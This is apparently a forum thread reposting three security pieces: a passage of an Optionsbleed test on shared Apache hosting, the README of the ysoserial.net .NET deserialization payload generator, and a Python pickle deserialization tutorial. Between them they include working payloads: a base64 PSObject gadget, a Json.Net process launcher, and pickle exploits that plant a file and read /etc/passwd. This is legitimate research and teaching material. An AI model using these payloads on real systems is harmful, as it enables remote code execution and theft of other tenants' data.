56789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> Allow from all </Limit> It’s three entries of different lengths: 100, 3000, and 2000. After multiple OPTIONS requests I got this: Definitely good length, but the content is uninteresting. I let Burp Intruder continue to make OPTIONS requests while I submitted a test POST request on Site2. While the POST on Site2 was successful, my OPTIONS requests running on Site1 began generating 500 errors. I looked at the error log on Site1 and saw multiple entries of varying content that looked like the following: [Thu Sep 21 23:45:44.990337 2017] [http:error] [pid 74566] [client 192.168.1.234:62875] AH02430: Response header 'Allow' value of 'GET,OPTIONS,POST,HEAD,0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901(@\xe8\x0f\xb2\x7f' contains invalid characters, aborting requ It appeared that some of the non-ASCII content it was grabbing from memory was making the request invalid to Apache, resulting in the 500 error. I figured it was a long-shot but I tried HttpProtocolOptions Unsafe to see if it could be returned to the client but some of the characters were still considered invalid. Nevertheless, I figured it didn’t matter much given the more viable attack vector would be a malicious actor modifying the .htaccess file on their virtual host of a shared hosting environment. It would stand to reason that they would also have access to their own web server error logs as well (and wouldn’t need to rely on data returned to the client). So, now I wanted to see if it was possible to access the POST data from Site2 in the error log of Site1 by modifying the .htaccess file further. After a bit of trial and error, I was able to consistently obtain POST data from Site2 in Site1’s error logs by doing the follow: First, I used the earlier .htaccess file with the initial set of three varying length numerical strings (100, 3000, 2000) and made a few thousand OPTIONS requests via Burp Intruder. Then, I switched up the .htaccess file to read as follows: 1 2 3 <Limit 0123456789 0123456789 0123456789> Allow from all </Limit> I left Burp Intruder OPTIONS requests running on Site1 with this .htaccess file, which began to generate 500 errors. While that was running, I submitted the following request to the PHP page on Site2: And here’s what I got in the error log on Site1: If you try to replicate this, you may get different results, especially if you deviate in length for either the .htaccess entries or the POST request on virtual host 2. Obviously, in an attack scenario, only the .htacess file would be under the bad actor’s control and the POST request on another virtual host would be unpredictable in content and length. However, I did find that varying lengths still resulted in data captured in the error log…it just may not be consistent. Experiment to see for yourself. UPDATE #1: I intentionally didn’t speculate on whether these test results are in any way significant simply because I may be missing something that would make this impractical in un-patched environments. Most organizations aren’t likely going to have exposed shared hosting environments in their own network anyway (and if they do provide the ability for untrusted actors to modify .htaccess on their servers they have bigger problems). For those that have web applications hosted by external hosting providers, my test environment may have been too simple or I might be missing a key consideration regarding shared memory and the typical multi-tenant hosting environment. In any event, I figured I would share these results in case it’s helpful for others to investigate further and either replicate or disprove the results. UPDATE #2: I have been able to get the POST data from Site2 to return directly to the client without generating an error fairly consistently by swapping out the values in the .htaccess file multiple times while the OPTIONS requests are running. Here is what has been working for me: Start running the OPTIONS requests on Site1 using Intruder (I just let it run for 99,999 requests) using the 100, 3000, 2000 length values in .htaccess. Modify .htaccess to use the three smaller 0123456789, 0123456789, 0123456789 values as shown previously. Switch back to the 100, 3000, 2000 lengths. Modify the .htaccess file again ,this time using ten 0123456789 values. Submit the POST request on Site2. Below is the result in *most* cases Again, keep in mind that this is partly dependent upon the length of the POST request submitted on site 2. You can adjust the length of the testdata string to see how your results vary. Until next time, Mike Follow @securitysift Sursa: https://www.securitysift.com/testing-optionsbleed/
-
ysoserial.net A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization. Description ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host. It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath. This project is inspired by Chris Frohoff's ysoserial project Disclaimer This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. This software is a personal project and not related with any companies, including Project owner and contributors employers. Usage $ ./ysoserial -h ysoserial.net generates deserialization payloads for a variety of .NET formatters. Available formatters: ActivitySurrogateSelector (ActivitySurrogateSelector gadget by James Forshaw. This gadget ignores the command parameter and executes the constructor of ExploitClass class.) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter LosFormatter ObjectDataProvider (ObjectDataProvider Gadget by Oleksandr Mirosh and Alvaro Munoz) Formatters: Json.Net FastJson JavaScriptSerializer PSObject (PSObject Gadget by Oleksandr Mirosh and Alvaro Munoz. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter NetDataContractSerializer LosFormatter TypeConfuseDelegate (TypeConfuseDelegate gadget by James Forshaw) Formatters: BinaryFormatter ObjectStateFormatter NetDataContractSerializer LosFormatter Usage: ysoserial.exe [options] Options: -o, --output=VALUE the output format (raw|base64). -g, --gadget=VALUE the gadget chain. -f, --formatter=VALUE the formatter. -c, --command=VALUE the command to be executed. -t, --test whether to run payload locally. Default: false -h, --help show this message and exit Examples $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd','/ccalc'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZsdDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs= Contributing Fork it Create your feature branch (git checkout -b my-new-feature) Commit your changes (git commit -am 'Add some feature') Push to the branch (git push origin my-new-feature) Create new Pull Request Additional Reading Are you my Type? Friday the 13th: JSON Attacks - Slides Friday the 13th: JSON Attacks - Whitepaper Exploiting .NET Managed DCOM Sursa: https://github.com/pwntester/ysoserial.net
-
- 1
-
-
Explaining and exploiting deserialization vulnerability with Python (EN) Sat 23 September 2017 Dan Lousqui Deserialization? Even though it was neither present in OWASP TOP 10 2013, nor in OWASP TOP 10 2017 RC1, Deserialization of untrusted data is a very serious vulnerability that we can see more and more often on current security disclosures. Serialization and Deserialization are mechanisms used in many environment (web, mobile, IoT, ...) when you need to convert any Object (it can be an OOM, an array, a dictionary, a file descriptor, ... anything) to something that you can put "outside" of your application (network, file system, database, ...). This conversion can be in both way, and it's very convenient if you need to save or transfer data (Ex: share the status of a game in multilayer game, create an "export" / "backup" file in a project, ...). However, we will see in this article how this kind of behavior can be very dangerous... and therefore, why I think this vulnerability will be present in OWASP TOP 10 2017 RC2. In python? With python, the default library used to serialize and deserialize objects is pickle. It is a really easy to use library (compared to something like sqlite3) and very convenient if you need to persist data. For example, if you want to save objects: import pickle import datetime my_data = {} my_data['last-modified'] = str(datetime.datetime.now()) my_data['friends'] = ["alice", "bob"] pickle_data = pickle.dumps(my_data) with open("backup.data", "wb") as file: file.write(pickle_data) That will create a backup.data file with the following content: last-modifiedqX2017-09-23 00:23:29.986499qXfriendsq]q(XaliceqXbobqeu. And if you want to retrieve your data with Python, it's easy: import pickle with open("backup.data", "rb") as file: pickle_data = file.read() my_data = pickle.loads(pickle_data) my_data # {'friends': ['alice', 'bob'], 'last-modified': '2001-01-01 01:02:03.456789'} Awesome, isn't it? Introducing... Pickle pRick ! In order to illustrate the awesomeness of pickle in term of insecurity, I developed a vulnerable application. You can retrieve the application on the TheBlusky/pickle-prick repository. As always with my Docker, just execute the build.sh or build.bat script, and the vulnerable project will be launched. This application is for Ricks, from the Rick and Morty TV show. For those who don't know this show (shame ...) Rick is a genius scientist who travel between universes and planets for great adventures with his grand son Morty. The show implies many multiverse and time-travel dilemma. Each universe got their own Rick, so I developed an application for every Rick, so they can trace their adventures by storing when, where and with who they travelled. Each Ricks must be able to use the application, and the data should never be stored on the server, so one Rick cannot see the data of other Ricks. In order to do that, Rick can export his agenda into a pickle_rick.data file that can be imported later. Obviously, this application is vulnerable (Rick would not offer other Ricks this kind of gift without a backdoor ...). If you don't want to be spoiled, and want to play a little game, you should stop reading this article and try to launch the application (locally), and try to pwn it (Without looking at the exploit folder obviously, ...) What's wrong with Pickle? pickle (like any other serialization / deserialization library) provides a way to execute arbitrary command (even if few developers know it). In order to do that, you simply have to create an object, and to implement a __reduce__(self) method. This method should return a list of n elements, the first being a callable, and the others arguments. The callable will be executed with underlying arguments, and the result will be the "unserialization" of the object. For exemple, if you save the following pickle object: import pickle import os class EvilPickle(object): def __reduce__(self): return (os.system, ('echo Powned', )) pickle_data = pickle.dumps(EvilPickle()) with open("backup.data", "wb") as file: file.write(pickle_data) And then later, try to deserialize the object : import pickle with open("backup.data", "rb") as file: pickle_data = file.read() my_data = pickle.loads(pickle_data) A Powned will be displayed with the loads function, as echo Powned will be executed. It's easy then to imagine what we can do with such a powerful vulnerability. The exploit In the pickle-prick application, pickle is used in order to retrieve all adventures: async def do_import(request): session = await get_session(request) data = await request.post() try: pickle_prick = data['file'].file.read() except: session['errors'] = ["Couldn't read pickle prick file."] return web.HTTPFound('/') prick = base64.b64decode(pickle_prick.decode()) session['adventures'] = [i for i in pickle.loads(prick)] return web.HTTPFound('/') So if we upload a malicious pickle, it will be executed. However, if we want to be able to read the result of a code execution, the __reducer__ callable, must return an object that meets with adventures signature (which is an array of dictionary having a date, universe, planet and a morty). In order to do that, we will use the vulnerability twice: a first time to upload a malicious python code, and a second time to execute it. 1. Generating a payload to generate a payload We want to upload a python file that contain a callable that meets adventures signature and will be executed on the server. Let's write an evil_rick_shell.py file with such a code: def do_evil(): with open("/etc/passwd") as f: data = f.readlines() return [{"date": line, "dimension": "//", "planet": "//","morty": "//"} for line in data] Now, let's create a pickle that will write this file on the server: import pickle import base64 import os class EvilRick1(object): def __reduce__(self): with open("evil_rick_shell.py") as f: data = f.readlines() shell = "\n".join(data) return os.system, ("echo '{}' > evil_rick_shell.py".format(shell),) prick = pickle.dumps(EvilRick1()) if os.name == 'nt': # Windows trick prick = prick[0:3] + b"os" + prick[5:] pickle_prick = base64.b64encode(prick).decode() with open("evil_rick1.data", "w") as file: file.write(pickle_prick) This pickle file will trigger an echo '{payload}' > evil_rick_shell.py command on the server, so the payload will be installed. As the os.system callable does not meet with adventure signature, uploading the evil_rick1.data should return a 500 error, but it will be too late for any security 2. Generating a payload to execute a payload Now let's create a pickle object that will call the evil_rick_shell.do_evil callable: import pickle import base64 import evil_rick_shell class EvilRick2(object): def __reduce__(self): return evil_rick_shell.do_evil, () prick = pickle.dumps(EvilRick2()) pickle_prick = base64.b64encode(prick).decode() with open("evil_rick2.data", "w") as file: file.write(pickle_prick) The evil_rick_shell.do_evil callable meeting with adventure signature, uploading the evil_rick2.data should be fine, and should add each line of the /etc/passwd file as an adventure. Build it all together Once both payloads are generated, simply upload the first one, then the second one, and you should be able to have this amazing screen: We can see that the do_evil() payload has been triggered, and we can see the content of /etc/passwd file. Even though the content of this file is not (really) sensitive, it's quite easy to imagine something more evil to be executed on Rick's server. How to protect against it It's simple... don't use pickle (or any other "wannabe" universal and automatic serializer) if you are going to parse untrusted data with it. It's not that hard to write your own convert_data_to_string(data) and convert_string_to_data(string) functions that won't be able to interpret forged object with malicious code within. I hope you enjoyed this article, and have fun with it Dan Lousqui IT Security Senior Consultant, developer, open source enthousiast, and so much more ! Sursa: https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
-
- 1
-